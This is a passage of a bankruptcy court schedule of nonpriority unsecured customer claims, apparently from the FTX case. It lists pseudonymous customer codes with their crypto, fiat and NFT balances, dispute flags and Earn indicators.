| 07413758 | | BTC[.00007849], LTC[0], SOL[0], USDT[0] | | |
| 07413767 | | BTC[0.00000008], DOGE[.03015], ETH[0], LINK[.0878], LTC[.004486], SOL[.000004], SUSHI[.11355], TRX[.298905], USD[1.42], USDT[4.22539855] | | |
| 07413768 | | ETH[0], LINK[4.42186553], MATIC[51.56024805], SOL[1.14922857], TRX[2218.72620718], USD[0.00], USDT[0.00000009] | | |
| 07413769 | | ETH[.00000001] | | |
| 07413774 | | BCH[0], ETH[0], ETHW[0], SHIB[49999999.99999999], TRX[0], USD[502.25] | | |
| 07413779 | Contingent, Disputed | DOGE[1], TRX[1], USD[0.25] | | |
| 07413781 | | CUSDT[11], SHIB[2], USD[0.00] | Yes | |
| 07413783 | | CUSDT[2], SOL[0], UNI[.00000914], USD[0.00], USDT[1.08047168] | Yes | |
| 07413787 | | AAVE[0], BAT[.0000068], BRZ[1], DOGE[2], GRT[1], LTC[0], MATIC[0], SHIB[1], SOL[0.00005025], USD[0.01], USDT[0.00000680] | Yes | |
| 07413788 | | USD[0.01] | | |
| 07413793 | | DOGE[3], ETH[.12676568], ETHW[.12676568], SGD[133.33], USD[0.00] | | |
| 07413797 | | BCH[.00066514], BTC[.00002327], DOGE[.2756], ETH[0.00000004], ETHW[0.00000004], LTC[.00374394], TRX[0], USD[1.30], USDT[0.00149045] | | |
| 07413800 | | DOGE[2], USD[0.00] | | |
| 07413807 | | TRX[.000137], UNI[.0196], USD[10.01], USDT[.005123] | | |
| 07413808 | | BTC[0.00009822], CUSDT[1], GRT[0], SHIB[24783.67604556], SUSHI[0], TRX[5], USD[0.62], USDT[0.00000009] | Yes | |
| 07413809 | | BRZ[1], SOL[0] | | |
| 07413813 | | TRX[1893.49927613], USD[0.00] | | |
| 07413816 | | USD[0.71] | | |
| 07413822 | | CUSDT[2], DOGE[1], SUSHI[1.2938772], TRX[115.23631201], USD[0.00] | | |
| 07413823 | | BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[100000], SUSHI[.415], TRX[.132], USD[0.03], USDT[0.00279734] | | |
| 07413824 | | BRZ[1], CUSDT[7], DOGE[3.000548], SOL[4.41971216], USD[0.00] | Yes | |
| 07413827 | | BCH[.00076], USD[500.00], USDT[0.18778644] | | |
| 07413828 | | ETH[0], SOL[0], USD[0.00] | | |
| 07413838 | | USD[0.01], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07413841 | | AUD[0.00], BTC[0], CAD[0.00], ETH[0], ETHW[0], EUR[0.00], PAXG[0], TRX[0], USD[0.00], USDT[0.00209215] | | |
| 07413846 | | BTC[.00727326], CUSDT[1], ETH[4.2857462], ETHW[4.28394618], USD[0.04] | Yes | |
| 07413852 | | LINK[.05], SUSHI[.49664829], TRX[715.128], USD[0.04] | | |
| 07413860 | | DOGE[2], SUSHI[.00035189], TRX[1], USD[0.00] | Yes | |
| 07413862 | | SOL[2.064524] | | |
| 07413873 | | CUSDT[1], DOGE[.02087097], TRX[1], USD[0.00] | | |
| 07413875 | | SOL[0] | | |
| 07413882 | | AAVE[34.713], BTC[.39053482], MKR[1.99954], UNI[.0312], USD[2605.13], USDT[.0045042] | | |
| 07413889 | | USD[0.10], USDT[0] | | |
| 07413892 | | BTC[.0000367], USDT[.003428] | | |
| 07413893 | | DOGE[6969.37910157], TRX[1], USD[1.00] | | |
| 07413894 | | BTC[.0001992], USD[0.95] | | |
| 07413897 | | BAT[.00004064], BRZ[4], CUSDT[15], DOGE[.00007867], GRT[.00033775], TRX[0.00058379], USD[0.01] | | |
| 07413899 | | DOGE[0.64800000], ETH[0], ETHW[0], SOL[0], USD[1.28] | | |
| 07413902 | | BTC[0], SUSHI[0], USD[0.00] | | |
| 07413903 | | BRZ[1], CUSDT[3], DOGE[2], ETH[.32362805], ETHW[.32345677], NFT (301223218923300952/ALPHA:RONIN #651)[1], NFT (515226735039815497/2D SOLDIER #1428)[1], SOL[59.80864787], TRX[4], USD[0.00] | Yes | |
| 07413912 | | BRZ[5], CUSDT[17], DOGE[1241.40523615], LINK[.00004024], SHIB[1.00000066], TRX[6], USD[155.40] | | |
| 07413914 | | ETH[0], USD[0.00] | | |
| 07413915 | | BTC[0.00452886], USD[38.69] | | |
| 07413916 | | BTC[0.00003022], USDT[0] | | |
| 07413930 | | USD[0.01] | | |
| 07413935 | | TRX[2], USD[0.00] | Yes | |
| 07413938 | | BAT[0], BTC[.05269703], CUSDT[5], DOGE[1], ETH[0.53607656], ETHW[0.53584658], GRT[1.00019173], SHIB[124632336.26984488], TRX[4], UNI[0], USD[0.00], YFI[.00800582] | Yes | |
| 07413950 | | CUSDT[22], DOGE[124.19280133], SHIB[282106.03929193], USD[0.00] | Yes | |
| 07413953 | | GRT[1], NFT (345775522469113465/FTX - Off The Grid Miami #535)[1], USD[0.00] | Yes | |
| 07413970 | | BTC[0], DAI[.003], ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07413971 | | USD[100.00] | | |
| 07413974 | | CUSDT[4], DOGE[208.68621429], GRT[39.94084511], SOL[12.49676417], SUSHI[21.36118357], TRX[5933.45214257], USD[0.00] | Yes | |
| 07413975 | | ETH[0], USD[0.00], USDT[.00000001] | | |
| 07413979 | | CUSDT[1], DOGE[30154.22836462], LTC[1.97532702], USD[0.18] | | |
| 07413980 | | USD[0.33] | | |
| 07413982 | | DOGE[1], ETH[.03117508], ETHW[.03117508], USD[0.00] | | |
| 07413987 | | BTC[.00298456], CUSDT[16], DOGE[23], ETH[.20160666], ETHW[.20160666], SHIB[1], SOL[4.78459468], SUSHI[5.74651214], TRX[3], UNI[3.11005091], USD[0.02] | | |
| 07413990 | | USD[0.00] | | |
| 07413992 | | CUSDT[2], GRT[1], TRX[2], USD[0.01] | | |
| 07413996 | | BTC[.0021637], USD[9.68] | | |
| 07413997 | | USD[0.87] | | |
| 07414000 | | CUSDT[1], ETH[.00000065], ETHW[.00000065], SHIB[4], USD[0.06] | Yes | |
| 07414001 | | BTC[0], CUSDT[1], DOGE[4], GRT[1], TRX[3], USD[0.00] | | |
| 07414012 | | TRX[1], USD[0.00] | | |
| 07414013 | | AUD[4.22], BAT[1.95471992], BCH[.06640723], BRZ[12.33414168], BTC[.0000944], CAD[8.15], CUSDT[157.62448565], DAI[4.36639983], DOGE[38.88645389], ETH[.00273598], ETHW[.00270862], EUR[6.34], GBP[2.35], GRT[.57648051], LINK[.03400036], LTC[.01790435], PAXG[.00433229], SGD[4.15], SOL[.10426571], SUSHI[.24926387], TRX[36.14523483], UNI[.11386717], USD[0.04], USDT[4.37424926], YFI[.00007723] | Yes | |
| 07414017 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07414020 | | BAT[17.46403262], BRZ[1], CUSDT[2], DOGE[9.9902728], SOL[40.44182667], SUSHI[15.72531096], UNI[11.1076715], USD[-294.21] | | |
| 07414026 | | BTC[0], USD[0.00] | | |
| 07414028 | | BTC[0], USD[3.86] | | |
| 07414032 | | USD[0.00] | | |
| 07414034 | | ETH[0], SOL[0], USD[0.00] | | |
| 07414035 | | BAT[2.01819523], BRZ[2], CUSDT[10], DOGE[6], GRT[4.00367791], SHIB[182.7264922], SUSHI[1.0005731], TRX[6], USD[0.10], USDT[0.00007541] | Yes | |
| 07414043 | | ETH[.2], ETHW[.2] | | |
| 07414045 | | DOGE[0], USD[0.00] | Yes | |
| 07414047 | | BTC[.00185354], DOGE[1], USD[0.00] | | |
| 07414049 | | BRZ[1], CUSDT[5], DOGE[135.30780867], USD[0.00] | Yes | |
| 07414055 | | BRZ[3], BTC[0], CUSDT[14], DOGE[11.63607233], GRT[1.00483867], MATIC[.81552382], TRX[4], UNI[1.09337887], USD[0.00], USDT[1.07740648] | Yes | |
| 07414056 | | ETH[.00013475], ETHW[0.00013475], TRX[.0047289], USD[0.00], USDT[0] | Yes | |
| 07414057 | | CUSDT[1], DOGE[148.38028909], USD[0.00] | Yes | |
| 07414064 | | CUSDT[1], TRX[1], USD[0.10] | | |
| 07414066 | | BAT[0], BRZ[0], BTC[0.00002944], DOGE[0], ETH[0], GRT[0], LINK[0], SUSHI[0], TRX[0], UNI[0], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07414072 | | USD[0.00] | | |
| 07414081 | | SOL[0] | | |
| 07414082 | | BAT[16.97687008], DOGE[182.03417363], TRX[189.37810275], USD[0.00], USDT[4.97551746] | | |
| 07414085 | | SOL[20.01], USD[0.14] | | |
| 07414086 | | DOGE[0] | | |
| 07414091 | | USD[0.46] | | |
| 07414092 | | SOL[0], USD[0.00], USDT[0.00000073] | | |
| 07414099 | | LINK[.0896], SUSHI[.3915], USD[4.72] | | |
| 07414102 | | BTC[0], GRT[.928], USD[0.00], YFI[.000064] | | |
| 07414105 | | USD[30.00] | | |
| 07414106 | | SOL[22.97815], USD[29.50] | | |
| 07414108 | | USD[0.00] | | |
| 07414114 | | DOGE[41.11677080], GRT[0], SOL[0], TRX[45.28878632], USD[0.00] | | |
| 07414117 | | SOL[32.868], SUSHI[24.9], USDT[8.74803081] | | |
| 07414119 | | BRZ[4], CUSDT[5], DOGE[0], GRT[2], SUSHI[1], TRX[1], USD[0.00] | | |
| 07414135 | | BTC[.00004278], LTC[.01185434], SUSHI[.11509683], USD[0.00] | | |
| 07414138 | | SOL[.00026771], USD[0.08], USDT[0.00000001] | Yes | |
| 07414140 | | MATIC[0], SOL[0.00001604], USD[0.00] | Yes | |
| 07414144 | | AAVE[0], BAT[8.24255599], BRZ[20.0873008], BTC[0], CUSDT[29], DOGE[28.20525497], ETH[0.00000017], ETHW[0.20460387], GRT[3], LINK[0.00000977], NFT [45270625178729848/The Hill by FTX #8733][1], SHIB[43], SOL[0.00011530], USD[0.56], USDT[1.00228365] | Yes | |
| 07414146 | | DOGE[2], ETH[0], MATIC[13.65893514], SHIB[1], TRX[564.61319561] | Yes | |
| 07414147 | | USD[4.91] | | |
| 07414155 | | CUSDT[10], DOGE[27.38482815], GRT[4.99692055], LINK[0], TRX[32.47794897], USD[0.00] | Yes | |
| 07414157 | | BTC[0.11163504], USD[0.00] | Yes | |
| 07414160 | | USD[0.00] | | |
| 07414162 | | CUSDT[0], DOGE[0], ETH[0], TRX[0], USD[0.28], USDT[0], YFI[0] | | |
| 07414163 | | BAT[3], BRZ[1], BTC[0], CUSDT[16], DOGE[25], ETH[0.00020998], ETHW[0.00257776], GRT[2], LINK[.25], SHIB[21], TRX[54.84689465], USD[0.00], USDT[4.69086864] | | |
| 07414164 | | BTC[0] | | |
| 07414168 | | USD[0.01] | | |
| 07414181 | | CUSDT[1], USD[0.00] | Yes | |
| 07414184 | | CUSDT[1], DOGE[1], ETH[.11055938], ETHW[.11055938], USD[0.00] | | |
| 07414188 | | CUSDT[1], ETH[0], ETHW[.1401194], NFT [495605610689679522/Humpty Dumpty #440][1], SHIB[16], SOL[0], USD[0.00] | Yes | |
| 07414189 | | SUSHI[.1835], USD[3.66] | | |
| 07414190 | | LINK[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07414197 | | CUSDT[4], DOGE[0], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | Yes | |
| 07414200 | | BAT[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07414204 | | BAT[1], CUSDT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07414210 | | DOGE[10], USD[0.00] | | |
| 07414211 | | AUD[0.00], BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0.00938236], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07414217 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07414218 | | BF_POINT[200], BTC[0], CUSDT[18], DOGE[1.00770435], ETH[0], LTC[0], SHIB[0], SOL[0], USD[0.00] | Yes | |
| 07414221 | | USD[23.11] | | |
| 07414226 | | SOL[.0228], USD[0.66] | | |
| 07414227 | | USD[4.74] | | |
| 07414228 | | BTC[.0000439], DOGE[.8766], SUSHI[.14], USD[0.10], USDT[0.00000001] | | |
| 07414231 | | CUSDT[3], DOGE[1], TRX[1], USD[0.01] | | |
| 07414242 | | USD[14.14], USDT[1.00000004] | | |
| 07414252 | | BTC[0.00009621], LTC[.00167828], SOL[17.928], USDT[.2928328] | | |
| 07414256 | | BAT[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], MKR[0], PAXG[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.15], USDT[0.00000001] | Yes | |
| 07414258 | | DOGE[1], USD[0.00] | | |
| 07414260 | | BAT[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], LTC[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00001459], YFI[0] | | |
| 07414267 | | USD[1.14] | | |
| 07414268 | | BTC[.01418311], USD[0.00], USDT[0] | | |
| 07414269 | | DOGE[.79687873], USD[4.75] | | |
| 07414274 | | NEAR[1.35310711], USD[0.00] | | |
| 07414275 | | CUSDT[1], USD[0.00] | | |
| 07414278 | | ETH[.00068949], ETHW[.0068949], USDT[2.5993546] | | |
| 07414283 | | USD[0.00] | | |
| 07414284 | | BCH[0], DOGE[.89137174], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07414289 | Contingent, Disputed | BTC[.0000004], ETH[.00001175], ETHW[.00001174], SOL[.00020988], USD[0.03] | Yes | |
| 07414292 | | ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07414300 | | BF_POINT[200], BRZ[1], BTC[.00000458], CUSDT[10], DOGE[3], GRT[.00000001], LINK[0], MATIC[.0004554], TRX[3], USD[-0.69] | Yes | |
| 07414314 | | CUSDT[1], ETH[.00257411], ETHW[.00254675], KSHIB[415.10323109], SHIB[379629.0788079], USD[0.02] | Yes | |
| 07414315 | | USD[0.00], USDT[0] | Yes | |
| 07414316 | | DOGE[.548], ETH[.00040205], ETHW[.00040205], SOL[142.87904942], USD[1.53], USDT[10.073213] | | |
| 07414323 | | USD[10.00] | | |
| 07414326 | | BTC[.00003171], DAI[0], GRT[0.64279741], LINK[0.03380850], YFI[0.00003640] | | |
| 07414336 | | BTC[.0000752], USD[0.00] | | |
| 07414337 | | BAT[1.0165555], BTC[.00954975], CUSDT[1307.27731671], NFT (292831701848442758/Settler #3210)[1], NFT (408388824487962056/Settler #618)[1], NFT (424288548687381428/CryptoFabula #7)[1], NFT (431178208356886051/Holy Unicorn Edition #13)[1], NFT (446498122593005491/Holy Unicorn Edition #8)[1], NFT (496806892279744025/PIG 14)[1], NFT (508747097698700260/PIG 23)[1], SHIB[2], SOL[12.73765954], TRX[974.08261362], USD[0.00] | Yes | |
| 07414347 | | BCH[0], SHIB[2], USD[0.00] | | |
| 07414351 | | CUSDT[7], SHIB[4], TRX[2], USD[0.00] | Yes | |
| 07414357 | | USD[0.00] | | |
| 07414363 | | BTC[0], CUSDT[1], ETH[0], TRX[2], USD[10.29], USDT[0] | Yes | |
| 07414366 | | BTC[0], LTC[0] | | |
| 07414368 | | LINK[.0185], NFT (316383609125366273/The 2974 Collection #2629)[1], NFT (423539031973240064/2974 Floyd Norman - CLE 1-0231)[1], NFT (474563623191570096/Birthday Cake #2629)[1], SOL[0], USD[1.22], USDT[0.00100000] | | |
| 07414371 | | USDT[517.92436222] | | |
| 07414377 | | USD[0.00] | | |
| 07414378 | | BAT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07414390 | | CUSDT[3], DOGE[7.86927175], GRT[.00004679], NFT (329268921769124349/3D CATPUNK #4218)[1], SOL[4.13520907], TRX[1.0000326], USD[0.00] | | |
| 07414391 | | BTC[0], ETH[0.00191198], ETHW[0.00191198], MATIC[0], USD[0.00] | | |
| 07414398 | | CUSDT[1], ETH[0], TRX[1], USD[0.00] | | |
| 07414404 | | SOL[20.78570734], UNI[0], USD[0.00], USDT[0] | | |
| 07414415 | | ETH[.009], ETHW[.009], USD[0.46] | | |
| 07414421 | | ETHW[.00032321], USD[0.09] | | |
| 07414424 | | BTC[0.00072404], SOL[0], USD[4.34], USDT[31.32853459] | | |
| 07414428 | | CUSDT[1], DOGE[1969.56126161], TRX[125.30409131], USD[0.00] | | |
| 07414435 | | BTC[0], USD[0.73] | | |
| 07414437 | | NFT (437074246715895035/Cathaus)[1], SOL[1.89285149], USD[0.00] | | |
| 07414443 | | USD[10.00] | | |
| 07414447 | | ETH[0], SOL[0], USD[0.00], USDT[3.7842861] | | |
| 07414448 | | CUSDT[1], TRX[0], USD[0.00], USDT[0] | | |
| 07414453 | | AAVE[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SHIB[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.10086612], YFI[0] | Yes | |
| 07414455 | | BTC[0.02322377], ETH[1.07262827], ETHW[1.07262826], MATIC[768.85229667], SOL[5.81655490] | | |
| 07414457 | | BAT[67.06308755], BTC[.00020347], CUSDT[1], DOGE[2], ETH[.03282429], ETHW[.03241389], KSHIB[.0021008], UNI[1.55069001], USD[0.00] | Yes | |
| 07414460 | | DOGE[1], ETH[0] | | |
| 07414465 | | BRZ[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07414476 | | AVAX[.05808251], SOL[.0067802], USD[1.72], USDT[0] | | |
| 07414478 | | SUSHI[0], UNI[0], USD[0.22], USDT[0.00000009] | | |
| 07414484 | | GRT[1.99525], LINK[8.9658], LTC[.009], USD[0.00], USDT[8.752325] | | |
| 07414485 | | USD[0.00] | | |
| 07414487 | | CUSDT[3], MATIC[27.66065699], USD[0.00] | Yes | |
| 07414496 | | BRZ[1], DOGE[1507.25338921], GRT[1.003128119], SHIB[122189.70918556], TRX[2], USD[14.77], USDT[0.00000001] | Yes | |
| 07414500 | | BAT[0], BTC[0], DOGE[0.62721097], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07414502 | | GRT[151.6846], SUSHI[130.0041], UNI[81.28992], USD[0.85], USDT[0.00000812] | | |
| 07414504 | | BF_POINT[300], BRZ[6.47903689], CUSDT[19], DOGE[16.18112278], LINK[.00006398], MATIC[58.89362913], TRX[7], USD[0.00] | Yes | |
| 07414505 | | BTC[.0512153], USD[0.00] | | |
| 07414509 | | ETH[10.00096982], GRT[142.8690105], SHIB[14], SUSHI[101.5884414], USD[16194.47], USDT[1.00006775] | Yes | |
| 07414520 | | DOGE[3.74450378], USD[0.00] | | |
| 07414532 | | CUSDT[1], DOGE[1], EUR[16.45], GBP[14.21], PAXG[.00571179], USD[0.00] | | |
| 07414533 | | BTC[0], DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07414543 | | ETH[.00039117], ETHW[0.00039117], LINK[.083185], NFT (314284744476493980/Scoogi #6830)[1], NFT (332357564698078467/Scoogi #6833)[1], NFT (403244606445821539/BabyBlob #278)[1], NFT (548842401427830253/Scoogi #6847)[1], SOL[0.00624000], USD[1.18], USDT[2.32684104] | | |
| 07414544 | | DOGE[1], USD[0.00] | | |
| 07414545 | | USD[0.00] | | |
| 07414547 | | ETH[0], SOL[116.89852252], USD[0.00], USDT[3.07091350] | | |
| 07414550 | | USD[0.00] | Yes | |
| 07414554 | | BTC[0], ETH[0.27570734], ETHW[0.27570734], USD[10304.22] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07414561 | Contingent, Disputed | DOGE[2], TRX[1], USD[0.00], USDT[0] | | |
| 07414563 | | BAT[1.0165555], BRZ[2], BTC[.00677973], CUSDT[2], DOGE[3.00300548], ETH[.10704073], ETHW[.10595344], MATIC[1.01181352], SHIB[1], SUSHI[0], TRX[5], USD[0.00] | Yes | |
| 07414564 | | USD[0.00] | | |
| 07414582 | | BRZ[1], CUSDT[3], DOGE[1], TRX[2], USD[0.01], USDT[0] | | |
| 07414584 | | BTC[.00881045], GRT[1], USD[0.00] | | |
| 07414589 | | DOGE[871.05436456], TRX[1058.67045811], USD[0.00] | | |
| 07414600 | | BTC[.00102687], DOGE[1], USD[0.00] | | |
| 07414604 | | BRZ[1], CUSDT[10], TRX[3], USD[0.00] | | |
| 07414624 | | CUSDT[2], DOGE[1111.26398705], USD[0.00] | | |
| 07414627 | | USD[0.00] | Yes | |
| 07414629 | | BRZ[3], DOGE[1], ETHW[20.63940865], GRT[3.00073362], NFT (566104857637822643/Coachella x FTX Weekend 1 #17924)[1], TRX[3], USD[0.00] | Yes | |
| 07414631 | Contingent, Disputed | LINK[.0416], SUSHI[.474], USD[7.84] | | |
| 07414632 | | CUSDT[1], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07414636 | | BTC[0], USD[0.01], USDT[0] | | |
| 07414645 | | DOGE[1], USD[0.00] | | |
| 07414652 | | ETHW[1.848], NFT (435907887146494609/LINT #210)[1], SOL[0.00128284], USD[0.00], USDT[0] | | |
| 07414656 | | USD[50.01] | | |
| 07414666 | | DOGE[2], USD[0.01] | | |
| 07414667 | | CUSDT[1], DOGE[271.95030147], TRX[1], USD[0.00] | | |
| 07414671 | | AVAX[0.21035013], CUSDT[4], USD[0.00] | Yes | |
| 07414675 | | BCH[.01981372], BTC[.00049162], CUSDT[9], DOGE[33.69725434], ETH[.00259603], ETHW[.00259603], SHIB[194392.44709802], TRX[85.90229811], USD[0.00] | | |
| 07414676 | | USD[0.00], USDT[0] | Yes | |
| 07414678 | | USD[0.01] | | |
| 07414681 | | USD[0.00] | | |
| 07414683 | | BAT[1.00969467], BF_POINT[100], BRZ[1], BTC[0], CUSDT[11], DOGE[15.29965979], ETHW[2.09965844], MATIC[0], SHIB[2], SOL[0.00162701], TRX[9], USD[3.01], USDT[1.05289705] | Yes | |
| 07414684 | | USD[0.01] | | |
| 07414685 | | BTC[0], ETH[0], LINK[0], LTC[0], SOL[0], USD[0.00] | | |
| 07414687 | | BTC[.00000925], DOGE[23.904], ETH[.00074995], ETHW[.00074995], SOL[13.20860892], USD[0.86] | | |
| 07414691 | | DOGE[1], TRX[833.72150016], USD[0.00] | | |
| 07414695 | | DOGE[ 30780917], USD[0.00] | | |
| 07414696 | | NFT (404112753082224400/Entrance Voucher #1967)[1], SHIB[3], USD[0.00] | Yes | |
| 07414702 | | BCH[0], USD[0.01], USDT[0] | | |
| 07414705 | | USD[0.00], USDT[0] | | |
| 07414708 | | DOGE[3.23401491], USD[0.00] | | |
| 07414713 | | BRZ[1], CUSDT[6], DOGE[2.74445603], TRX[4], USD[0.00] | | |
| 07414725 | Contingent, Disputed | USD[0.32] | | |
| 07414731 | | BRZ[1], BTC[.00372833], CUSDT[24], DOGE[6.09193251], GRT[556.27489419], SOL[5.60431047], SUSHI[262.30981543], TRX[2648.2682157], UNI[12.20541614], USD[0.00] | Yes | |
| 07414735 | | ETHW[.0003], NEAR[.0316], USD[366.50], USDT[0] | | |
| 07414743 | | CUSDT[1], DOGE[1], GRT[117.4112337], LINK[2.23247936], SUSHI[7.56030808], TRX[1], USD[0.00] | Yes | |
| 07414745 | | SOL[0.00000001], USD[2.03] | | |
| 07414746 | | CUSDT[2], DOGE[340.50681319], ETH[.00348862], ETHW[.00344758], TRX[1], USD[0.00] | Yes | |
| 07414751 | | USD[0.01] | | |
| 07414753 | | USD[0.03] | | |
| 07414754 | | BTC[.3503004], DOGE[2], ETH[2.39871525], ETHW[2.39778104], SOL[44.51133199], TRX[9332.45045196], USDT[0] | Yes | |
| 07414759 | | MATIC[72.28666483], NFT (424128159060860853/Space Dream #15)[1], NFT (475292687166704648/Dead Set #1)[1], NFT (476099407679517940/Entrance Voucher #2154)[1], PAXG[.09123423], SOL[2.81504483], SUSHI[16.86205718], USD[301.24] | | |
| 07414760 | | ETH[.18996849], USD[0.01] | | |
| 07414762 | | USD[0.84] | | |
| 07414764 | | USD[0.01] | | |
| 07414765 | | USD[0.62] | | |
| 07414773 | | BTC[0.15638154], SOL[16.21], USD[1.24] | | |
| 07414777 | | BRZ[2], CUSDT[1], DOGE[558.37052601], GRT[1.00498957], TRX[2], USD[0.01] | Yes | |
| 07414778 | | USD[26.08] | | |
| 07414781 | | USD[6.68] | | |
| 07414786 | | CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07414793 | | USD[2.13], USDT[0] | | |
| 07414795 | | CUSDT[1], USD[10.45] | Yes | |
| 07414798 | | USD[0.01] | | |
| 07414801 | | TRX[1], USD[0.00] | | |

Amended Schedule F-52 nonpriority nonsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07414802 | | USD[50.00] | | |
| 07414809 | | BRZ[1], CUSDT[1], DOGE[788.24034009], TRX[2], USD[0.00], YFI[.00146229] | | |
| 07414810 | | BF_POINT[100], DOGE[0], ETH[0], ETHW[0], NFT [464744882042752674/Entrance Voucher #1426][1], USD[0.00] | Yes | |
| 07414811 | | BTC[0] | | |
| 07414813 | | LTC[0] | | |
| 07414814 | | DOGE[.606], SUSHI[.2644], USD[1.83] | | |
| 07414815 | | DOGE[.404], NFT [299687112451605449/Cool Bean #2044][1], SOL[.12], TRX[11126.313], USD[9.77] | | |
| 07414821 | | BTC[.00334257], CUSDT[1], USD[0.00] | | |
| 07414824 | | SOL[0], USDT[0.00000009] | | |
| 07414825 | | USD[25.00] | | |
| 07414828 | | DOGE[5.454276], USD[0.00] | | |
| 07414831 | | BAT[13.17292811], BCH[.00023107], BRZ[.00009541], BTC[.00003855], CUSDT[.47009], DOGE[22.34625649], ETH[.00075829], ETHW[.00075065], LINK[.05852719], MATIC[5.51850661], PAXG[.00001154], SOL[.00465206], TRX[.67369741], USD[-1.01], USDT[.00560171] | Yes | |
| 07414833 | | LTC[.00262254] | | |
| 07414835 | | BCH[.39627457], CUSDT[18], DOGE[.70949906], TRX[3], UNI[.15385965], USD[0.05] | | |
| 07414837 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07414838 | | SOL[0] | | |
| 07414839 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00] | | |
| 07414840 | | BTC[0], USD[0.00] | | |
| 07414842 | | BAT[11.50887155], BRZ[2], CUSDT[16], DOGE[193.78655026], TRX[70.16158906], USD[1.28] | | |
| 07414850 | | USD[0.00], USDT[0] | | |
| 07414851 | | USD[0.01] | | |
| 07414852 | | ETH[0.00061263], ETHW[0.00061263], SOL[.01795302], USD[25.65] | | |
| 07414854 | | CUSDT[8], SHIB[9], USD[5.22] | Yes | |
| 07414855 | | SOL[254.07257753], USD[0.00], USDT[0.00035260] | | |
| 07414858 | | BF_POINT[200], BTC[.00789653], CUSDT[2], DOGE[26074.98287435], ETH[.28910887], ETHW[.28891615], TRX[3], USD[0.00] | Yes | |
| 07414862 | | DOGE[33489.77533823], TRX[1], USD[0.50] | Yes | |
| 07414866 | | SUSHI[8.991], USD[0.14] | | |
| 07414869 | | BRZ[1], CUSDT[1], DOGE[4], SUSHI[1], TRX[1], USD[0.00] | | |
| 07414871 | | DOGE[1.14939325], TRX[5175.92625828], USD[0.00] | Yes | |
| 07414872 | | BAT[2.10190812], BRZ[2], CUSDT[7], DOGE[1714.75015386], ETH[.09570583], ETHW[.09466677], SUSHI[12.92795163], TRX[1], USD[0.00] | Yes | |
| 07414878 | | DOGE[188.08726722], USD[0.00] | | |
| 07414886 | | USD[32.40] | | |
| 07414887 | | SOL[0] | | |
| 07414888 | | CUSDT[3.00000009], DOGE[7998.50356539], USD[0.38], USDT[2.20842395] | Yes | |
| 07414890 | | BTC[0], ETH[.00000001], USD[0.16] | | |
| 07414891 | | BAT[1.01563679], CUSDT[4], DOGE[0], USD[2.95] | Yes | |
| 07414895 | | SOL[.495] | | |
| 07414904 | | DOGE[200.84093739], TRX[97.608], USD[10.10] | | |
| 07414908 | | BAT[1.0165555], BRZ[1], DOGE[52.46404803], USD[0.00] | Yes | |
| 07414911 | | BTC[.0070508], CUSDT[4], DOGE[8.51768757], ETH[.13893488], ETHW[.13790974], LINK[.05865166], LTC[.03792818], PAXG[.00032824], TRX[5], USD[0.00] | Yes | |
| 07414929 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07414930 | | BTC[.11724375], ETH[1.77003086], ETHW[1.77003086], LINK[158.40942355], SOL[132.49811608], USD[0.00], USDT[0.00045696] | | |
| 07414931 | | USD[0.00] | | |
| 07414933 | | BTC[0], DOGE[0], ETH[.63209428], ETHW[.63182886], LINK[0], SHIB[4], USD[0.00], USDT[0.00000001] | Yes | |
| 07414940 | | BTC[.00198359], CUSDT[6], USD[0.00] | Yes | |
| 07414951 | | SOL[2.06749739] | | |
| 07414953 | | DOGE[.10131666], TRX[.000003], USD[0.00], USDT[0.00000001] | | |
| 07414958 | | CUSDT[5], DOGE[.00381894], TRX[1], USD[0.00] | | |
| 07414961 | | CUSDT[4], DOGE[90.97281399], TRX[811.57606689], USD[0.00] | Yes | |
| 07414964 | | BTC[.5131], ETH[2.397], ETHW[2.397], MATIC[7.89], SOL[191.3502], TRX[.0124], USD[6.26] | | |
| 07414966 | | ETH[.00000001], ETHW[0], SOL[0], USD[1.31] | | |
